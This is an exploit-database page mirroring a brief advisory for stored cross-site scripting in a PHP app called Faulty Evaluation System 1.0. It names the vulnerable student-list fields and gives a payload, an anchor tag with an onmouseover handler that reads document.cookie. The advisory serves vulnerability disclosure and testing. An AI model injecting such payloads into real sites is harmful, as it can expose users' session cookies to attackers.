Advertisement






Faulty Evaluation System 1.0 multiple Stored Cross-Site Scripting

CVE Category Price Severity
CVE-2021-3456 CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2021-03-07
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021030039

Below is a copy:

Faulty Evaluation System 1.0 multiple Stored Cross-Site Scripting
# Exploit Title: Faulty Evaluation System 1.0 - 'multiple' Stored Cross-Site Scripting
# Date: 2021-02-16
# Exploit Author: Suresh Kumar
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/14710/faulty-evaluation-system-using-phpcodeigniter-source-code.html
# Software: Faulty Evaluation System 1.0
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4

# Vulnerable Page: http://localhost/evaluation/student/list
# Vulnerable functionality: 'Student'
# Vulnerable Input Field : {Firtstname} {Lastname} {Middle Name}
# Payload used:

<a onmouseover="alert(document.cookie)">xxs link</a>

# POC: Whenever we will go to the page (
http://localhost/evaluation/student/list) where the script is injected, the stored script will be executed.
# You will see your Javascript code (XSS) executed.

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum